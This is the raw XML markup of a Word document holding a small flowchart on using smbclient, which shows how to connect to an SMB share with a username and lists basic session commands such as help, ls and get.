LgIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAMIJ0LjgAAAABwEAAA8AAAAAAAAAAAAAAAAA7gQAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAAD7BQAAAAA=&#10;" adj="-11796480,,5400" path="m63395,l2399030,r,l2399030,316970v,35012,-28383,63395,-63395,63395l,380365r,l,63395c,28383,28383,,63395,xe" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="63395,0;2399030,0;2399030,0;2399030,316970;2335635,380365;0,380365;0,380365;0,63395;63395,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,2399030,380365"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="00F47F10">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t xml:space="preserve">smbclient  &gt;&gt; Login Access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1E9A8F" wp14:editId="421C36CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2552689</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>50660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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3A51" id="Down Arrow 88" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:201pt;margin-top:4pt;width:30.1pt;height:34.85pt;rotation:-90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ilhAIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjZJEwoRGxSIqCoh&#10;QIKKZ8drZy35VtvJhn59j70bbuWp6j5YM57xXM6Z2bPzvdFkJ0JUztZ0fDSiRFjuGmU3Nf35cPXl&#10;hJKYmG2YdlbU9ElEer74/Oms83Mxca3TjQgEQWycd76mbUp+XlWRt8KweOS8sDBKFwxLUMOmagLr&#10;EN3oajIaHVedC40PjosYcbvqjXRR4kspeLqVMopEdE1RWypnKOc6n9XijM03gflW8aEM9g9VGKYs&#10;kj6HWrHEyDaov0IZxYOLTqYj7kzlpFRclB7QzXj0rpv7lnlRegE40T/DFP9fWH6zuwtENTU9AVOW&#10;GXC0cp0lyxBcR3AJhDof53C893dh0CLE3O5eBkOCA6zjY9CBr6CAvsi+gPz0DLLYJ8Jx+fVkMvkG&#10;KjhM0+lkdjrLKao+Vo7pQ0zfhTMkCzVtUE0ppkRmu+uYev+DX34TnVbNldK6KGGzvtSB7BhIn12c&#10;XqwOKd64aUs61I1icjUMwyc1SxCNBxzRbihheoOp5imU3G9exw+SlOQta8SQuuDRFzu4l0bfxMld&#10;rFhs+yfF1A+lUQmboZUBNT2yfSRtcxpRZnvAIvPTM5KltWuewGlhBZ1Fz68UklyzmO5YwHTjEhub&#10;bnFI7YCBGyRKWhd+f3Sf/TF0sFLSYVuAz68tC4IS/cNiHE/H0ynCpqJMZ98mUMJry/q1xW7NpQM3&#10;41JdEbN/0gdRBmcesdjLnBUmZjly90wMymXqtxi/Bi6Wy+KGlfIsXdt7z3PwjFOG92H/yIIfxilh&#10;Dm/cYbPY/N1A9b75pXXLbXJSlWl7wRUMZgXrWLgcfh1531/rxevlB7f4AwAA//8DAFBLAwQUAAYA&#10;CAAAACEAA1bhl+AAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU7DMBBF90jcwRokdtTBhYSG&#10;OFUFaimIRWk5gBsPcURsR7bbBk7PsILl6D/9eb+aj7ZnRwyx807C9SQDhq7xunOthPfd8uoOWEzK&#10;adV7hxK+MMK8Pj+rVKn9yb3hcZtaRiUulkqCSWkoOY+NQavixA/oKPvwwapEZ2i5DupE5bbnIsty&#10;blXn6INRAz4YbD63ByvheWXFsngNK7NZ37bfu8fN04tYSHl5MS7ugSUc0x8Mv/qkDjU57f3B6ch6&#10;CdNZIQilQNAEAm7yfAZsL6GYZsDriv9fUP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA&#10;4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEA&#10;OP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA&#10;SiK4pYQCAAAoBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAA&#10;ACEAA1bhl+AAAAAJAQAADwAAAAAAAAAAAAAAAADeBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAE&#10;AAQA8wAAAOsFAAAAAA==&#10;" adj="12272" fillcolor="#5b9bd5" strokecolor="#41719c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1106" w:rsidRDefault="008D602E" w:rsidP="008F110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898DDD" wp14:editId="6C143505">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3041650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>173495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2881173" cy="416560"/>
                <wp:effectExtent l="0" t="0" r="14605" b="2159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3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106" w:rsidRDefault="008F1106" w:rsidP="008D602E">
                            <w:r w:rsidRPr="008F1106">
                              <w:t>smbclient //IP_addr/username -U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98DDD" id="Rounded Rectangle 36" o:spid="_x0000_s1085" style="position:absolute;margin-left:239.5pt;margin-top:13.65pt;width:226.85pt;height:3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uhdAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Tem/U6tpMYr4NxSCmE&#10;JORCnmWtZC+VNKoke9f9+o60l4Q00FL6otXs3M+c0eKy0YochPMVmILmJyNKhOFQVmZb0Oen6y/n&#10;lPjATMkUGFHQo/D0cvn506K2czGGHahSOIJBjJ/XtqC7EOw8yzzfCc38CVhhUCnBaRZQdNusdKzG&#10;6Fpl49FoltXgSuuAC+/x71WrpMsUX0rBw52UXgSiCoq1hXS6dG7imS0XbL51zO4q3pXB/qEKzSqD&#10;SYdQVywwsnfVb6F0xR14kOGEg85AyoqL1AN2k4/edfO4Y1akXhAcbweY/P8Ly28P945UZUFPZ5QY&#10;pnFGD7A3pSjJA6LHzFYJgjoEqrZ+jvaP9t51ksdr7LqRTscv9kOaBO5xAFc0gXD8OT4/z/OzU0o4&#10;6ib5bDpL6Gev3tb58FWAJvFSUBfLiDUkYNnhxgdMi/a9HQqxpLaIdAtHJWIdyjwIiV1h2jx5Jz6J&#10;tXLkwJAJjHNhwjQ2hfGSdXSTlVKD4/jPjp19dBWJa4PzX2QdPFJmMGFw1pUB91H28nvelSxb+x6B&#10;tu8IQWg2TRrn9KIf2QbKI87YQUt+b/l1hQDfMB/umUO2417gBoc7PKSCuqDQ3SjZgfv50f9ojyRE&#10;LSU1bk9B/Y89c4IS9c0gPS/yySSuWxIm07MxCu6tZvNWY/Z6DTiWHN8Ky9M12gfVX6UD/YKLvopZ&#10;UcUMx9wF5cH1wjq0W41PBRerVTLDFbMs3JhHy3siRO48NS/M2Y5lAfl5C/2msfk7nrW2cUQGVvsA&#10;skokjFC3uHYjwPVMXOqekrj/b+Vk9frgLX8BAAD//wMAUEsDBBQABgAIAAAAIQDJS1gV3QAAAAkB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcqFO3IiSNU1EEB460PIAbb5Oo8TqK&#10;nR94epYT3GY1o9lviv3iOjHhEFpPGtarBARS5W1LtYbP09vDE4gQDVnTeUINXxhgX97eFCa3fqYP&#10;nI6xFlxCITcamhj7XMpQNehMWPkeib2LH5yJfA61tIOZudx1UiXJo3SmJf7QmB5fGqyux9FpeLWH&#10;i32/0pgeXOi/560yyaS0vr9bnncgIi7xLwy/+IwOJTOd/Ug2iE7DNs14S9Sg0g0IDmQblYI4s1AZ&#10;yLKQ/xeUPwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAA&#10;AAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAniKuhdAIAADgFAAAOAAAAAAAA&#10;AAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDJS1gV3QAAAAkBAAAPAAAA&#10;AAAAAAAAAAAAAM4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F1106" w:rsidRDefault="008F1106" w:rsidP="008D602E">
                      <w:r w:rsidRPr="008F1106">
                        <w:t>smbclient //IP_addr/username -U username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1106" w:rsidRDefault="008F1106" w:rsidP="008F1106"/>
    <w:p w:rsidR="007A436E" w:rsidRDefault="008B4BB9" w:rsidP="007A436E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DAD72F8" wp14:editId="22204C71">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1118235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152983</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1338580" cy="1257935"/>
                <wp:effectExtent l="0" t="0" r="13970" b="1841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1257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36E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="007D28B7">
                              <w:t xml:space="preserve">After connecting with </w:t>
                            </w:r>
                            <w:r>
                              <w:t>smbclient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D72F8" id="Oval 83" o:spid="_x0000_s1086" style="position:absolute;margin-left:88.05pt;margin-top:12.05pt;width:105.4pt;height:99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6QfAIAAE0FAAAOAAAAZHJzL2Uyb0RvYy54bWysVF9P2zAQf5+072D5faRpKZSKFFUgpkkI&#10;qsHEs+vYxJLt82y3Sffpd3bSgAbaw7Q8OHe+u9/99+VVZzTZCx8U2IqWJxNKhOVQK/tS0R9Pt18W&#10;lITIbM00WFHRgwj0avX502XrlmIKDehaeIIgNixbV9EmRrcsisAbYVg4AScsCiV4wyKy/qWoPWsR&#10;3ehiOpmcFS342nngIgS8vemFdJXxpRQ8PkgZRCS6ohhbzKfP5zadxeqSLV88c43iQxjsH6IwTFl0&#10;OkLdsMjIzqt3UEZxDwFkPOFgCpBScZFzwGzKyR/ZPDbMiZwLFie4sUzh/8Hy+/3GE1VXdDGjxDKD&#10;PXrYM02Qxdq0LixR5dFt/MAFJFOinfQm/TEF0uV6HsZ6ii4SjpflbLaYL7DsHGXldH5+MZsn1OLV&#10;3PkQvwowJBEVFVorF1LObMn2dyH22kctNE0R9TFkKh60SMrafhcS80Cv02ydJ0hca08wm4oyzoWN&#10;ZS9qWC366/kEvyGk0SIHmAETslRaj9gDQJrO99h9rIN+MhV5AEfjyd8C641Hi+wZbByNjbLgPwLQ&#10;mNXgudc/FqkvTapS7LZd7vFZzjVdbaE+YOM99BsRHL9V2IE7FuKGeVwB7BqudXzAQ2poKwoDRUkD&#10;/tdH90kfJxOllLS4UhUNP3fMC0r0N4sze1GenqYdzMzp/HyKjH8r2b6V2J25BuxciQ+I45lM+lEf&#10;SenBPOP2r5NXFDHL0XdFefRH5jr2q47vBxfrdVbDvXMs3tlHxxN4KnQar6fumXk3jGHECb6H4/q9&#10;G8VeN1laWO8iSJXn9LWuQwtwZ/MsDe9LehTe8lnr9RVc/QYAAP//AwBQSwMEFAAGAAgAAAAhAA1S&#10;F0LeAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISNxYujGVrjSdEFIlQOJA&#10;KfesMW20xqmadCv8eswJfLGe/fT8udgvbhAnnIL1pGC9SkAgtd5Y6hQ079VNBiJETUYPnlDBFwbY&#10;l5cXhc6NP9MbnurYCQ6hkGsFfYxjLmVoe3Q6rPyIxLtPPzkdWU6dNJM+c7gb5CZJUum0Jb7Q6xEf&#10;e2yP9ewUfD9VjY3zrs6S5uX4un2uvLQfSl1fLQ/3ICIu8c8Mv/iMDiUzHfxMJoiB9V26ZquCzZY7&#10;G26zdAfiwAMukGUh/79Q/gAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCXlZ6QfAIAAE0F&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQANUhdC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A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="007D28B7">
                        <w:t xml:space="preserve">After connecting with </w:t>
                      </w:r>
                      <w:r>
                        <w:t>smbclient</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007A436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F57853" wp14:editId="0D15ED29">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3042285</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>168173</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="584835" cy="1411605"/>
                <wp:effectExtent l="0" t="0" r="24765" b="1714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4116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6E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                            <w:r>
                              <w:t>help</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                            <w:r>
                              <w:t>ls</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                            <w:r>
                              <w:t>get</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E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57853" id="Rounded Rectangle 84" o:spid="_x0000_s1087" style="position:absolute;margin-left:239.55pt;margin-top:13.25pt;width:46.05pt;height:111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/4cAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95Gma1lXkaIKxDQJ&#10;AQImPruO3UZzfN7ZbdL9+p2dFxBD2jTtS+LzvT/3nM/O29qwg0JfgS14fjLhTFkJZWW3Bf/2ePVh&#10;wZkPwpbCgFUFPyrPz1fv3501bqmmsANTKmQUxPpl4wq+C8Ets8zLnaqFPwGnLCk1YC0CibjNShQN&#10;Ra9NNp1MTrMGsHQIUnlPt5edkq9SfK2VDLdaexWYKTjVFtIX03cTv9nqTCy3KNyukn0Z4h+qqEVl&#10;KekY6lIEwfZY/RaqriSCBx1OJNQZaF1JlXqgbvLJq24edsKp1AuB490Ik/9/YeXN4Q5ZVRZ8MePM&#10;ippmdA97W6qS3RN6wm6NYqQjoBrnl2T/4O6wlzwdY9etxjr+qR/WJnCPI7iqDUzS5XwxW3yccyZJ&#10;lc/y/HQyj0GzZ2+HPnxRULN4KDjGMmINCVhxuPahsx/syDmW1BWRTuFoVKzD2HulqStKmyfvxCd1&#10;YZAdBDFBSKlsGPIn6+imK2NGx+mfHXv76KoS10bnv8g6eqTMYMPoXFcW8K3s5fe8h0x39gMCXd8R&#10;gtBu2jTO02QarzZQHmnGCB35vZNXFQF8LXy4E0hsp72gDQ639NEGmoJDf+JsB/jzrftoTyQkLWcN&#10;bU/B/Y+9QMWZ+WqJnp/z2SyuWxJm809TEvClZvNSY/f1BdBYcnornEzHaB/McNQI9RMt+jpmJZWw&#10;knIXXAYchIvQbTU9FVKt18mMVsyJcG0fnByIELnz2D4JdD3LAvHzBoZNE8tXPOts44gsrPcBdJVI&#10;+IxrPwJaz8Tl/imJ+/9STlbPD97qFwAAAP//AwBQSwMEFAAGAAgAAAAhAB/Yp2XeAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyokyhtQohTUQQLlrR8wDR2k6jxOIqdB3w9&#10;wwqWM3N059xyv9pezGb0nSMF8SYCYah2uqNGwefp7SEH4QOSxt6RUfBlPOyr25sSC+0W+jDzMTSC&#10;Q8gXqKANYSik9HVrLPqNGwzx7eJGi4HHsZF6xIXDbS+TKNpJix3xhxYH89Ka+nqcrIJXfbjo9ytN&#10;2cH64XtJE4zmRKn7u/X5CUQwa/iD4Vef1aFip7ObSHvRK0izx5hRBcluC4KBbRYnIM68SPMcZFXK&#10;/xWqHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCaj+/4cAIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAf2Kdl3gAAAAoBAAAPAAAAAAAA&#10;AAAAAAAAAMo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7A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                      <w:r>
                        <w:t>help</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                      <w:r>
                        <w:t>ls</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E">
                      <w:r>
                        <w:t>get</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="007A436E" w:rsidRDefault="007A436E" w:rsidP="007A436E"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8F1106">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1106" w:rsidRDefault="007A436E" w:rsidP="008F1106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1E9A8F" wp14:editId="421C36CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2552079</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>221195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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0" cy="44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C2E7" id="Down Arrow 89" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:200.95pt;margin-top:17.4pt;width:30.1pt;height:34.85pt;rotation:-90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f5hgIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1PGzEQvVfqf7B8L5ukCZAoGxSIqCoh&#10;QALE2fF6s5b8VdvJhv76Pns3QCinqnuwZjzjNzNvZnZ+sdeK7IQP0pqSDk8GlAjDbSXNpqRPj9ff&#10;zikJkZmKKWtESV9EoBeLr1/mrZuJkW2sqoQnADFh1rqSNjG6WVEE3gjNwol1wsBYW69ZhOo3ReVZ&#10;C3StitFgcFq01lfOWy5CwO2qM9JFxq9rweNdXQcRiSopcov59Plcp7NYzNls45lrJO/TYP+QhWbS&#10;IOgr1IpFRrZe/gWlJfc22DqecKsLW9eSi1wDqhkOPlTz0DAnci0gJ7hXmsL/g+W3u3tPZFXS8ykl&#10;hmn0aGVbQ5be25bgEgy1Lszg+ODufa8FiKncfe018Ra0Dk/RDnyZBdRF9pnkl1eSxT4Sjsvv56PR&#10;GVrBYRqPR5PpJIUoOqyE6XyIP4TVJAklrZBNTiYjs91NiJ3/wS+9CVbJ6loqlRW/WV8pT3YMTZ9c&#10;Ti9XhxBHbsqQFnkjmZQNw/DVikWI2oGOYDaUMLXBVPPoc+yj1+GTIDl4wyrRh858dMn27rnQI5xU&#10;xYqFpnuSTd1QahmxGUpqtKZjtkNSJoURebZ7LlJ/uo4kaW2rF/Q0dwWVBcevJYLcsBDvmcd04xIb&#10;G+9w1MqCA9tLlDTW//7sPvlj6GClpMW2gJ9fW+YFJeqnwThOh+MxYGNWxpOzERT/3rJ+bzFbfWXR&#10;m2HOLovJP6qDWHurn7HYyxQVJmY4Yned6JWr2G0xfg1cLJfZDSvlWLwxD44n8MRTovdx/8y868cp&#10;Yg5v7WGz2OzDQHW+6aWxy220tczT9sYrOpgUrGPuZf/rSPv+Xs9ebz+4xR8AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQCmnan14QAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/LTsMwEEX3SPyDNUjsqNMA&#10;aRPiVBWopSAWfX2AGw9xRDyObLcNfD3uCnYzmqM755azwXTshM63lgSMRwkwpNqqlhoB+93ibgrM&#10;B0lKdpZQwDd6mFXXV6UslD3TBk/b0LAYQr6QAnQIfcG5rzUa6Ue2R4q3T+uMDHF1DVdOnmO46Xia&#10;JBk3sqX4QcsenzXWX9ujEfC2NOli8uGWer16bH52L+vX93QuxO3NMH8CFnAIfzBc9KM6VNHpYI+k&#10;POsE3OeTcUQvQwYsAg9ZFrscBOT5FHhV8v8Nql8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEA1s+n+YYCAAAoBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEApp2p9eEAAAAJAQAADwAAAAAAAAAAAAAAAADgBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" adj="12272" fillcolor="#5b9bd5" strokecolor="#41719c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1106" w:rsidRPr="008F1106" w:rsidRDefault="008F1106" w:rsidP="008F1106">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008F1106" w:rsidRPr="008F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BA" w:rsidRDefault="00DE30BA" w:rsidP="005F0D9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DE30BA" w:rsidRDefault="00DE30BA" w:rsidP="005F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BA" w:rsidRDefault="00DE30BA" w:rsidP="005F0D9E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DE30BA" w:rsidRDefault="00DE30BA" w:rsidP="005F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A294C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="08D67752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43D91185"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C50AC9CA"/>
    <w:lvl w:ilvl="0" w:tplc="0516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B6C20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E80B956"/>
    <w:lvl w:ilvl="0" w:tplc="69044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5D4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D7A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9E"/>
    <w:rsid w:val="000243A6"/>
    <w:rsid w:val="00130DFA"/>
    <w:rsid w:val="001531BD"/>
    <w:rsid w:val="001C6DF3"/>
    <w:rsid w:val="001E0CB4"/>
    <w:rsid w:val="00276B73"/>
    <w:rsid w:val="0028154B"/>
    <w:rsid w:val="002D3673"/>
    <w:rsid w:val="002F773F"/>
    <w:rsid w:val="003229F4"/>
    <w:rsid w:val="00476B3F"/>
    <w:rsid w:val="004952F9"/>
    <w:rsid w:val="004A29C7"/>
    <w:rsid w:val="0051746D"/>
    <w:rsid w:val="0056772E"/>
    <w:rsid w:val="005F0D9E"/>
    <w:rsid w:val="006F4986"/>
    <w:rsid w:val="007A436E"/>
    <w:rsid w:val="007D28B7"/>
    <w:rsid w:val="008B4BB9"/>
    <w:rsid w:val="008D602E"/>
    <w:rsid w:val="008F1106"/>
    <w:rsid w:val="009F6E91"/>
    <w:rsid w:val="00A13BA3"/>
    <w:rsid w:val="00AE2ED3"/>
    <w:rsid w:val="00B90091"/>
    <w:rsid w:val="00C70606"/>
    <w:rsid w:val="00D16CAE"/>
    <w:rsid w:val="00D628B3"/>
    <w:rsid w:val="00DE30BA"/>
    <w:rsid w:val="00E67F88"/>
    <w:rsid w:val="00EF48EB"/>
    <w:rsid w:val="00F47F10"/>
    <w:rsid w:val="00F63C45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705E-32D3-4F45-9865-5CE121E2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9E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005F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9E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005F0D9E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0051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Bumblebee</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bumblebee</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <cp:lastPrinted>2024-05-16T05:13:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-15T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-16T05:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>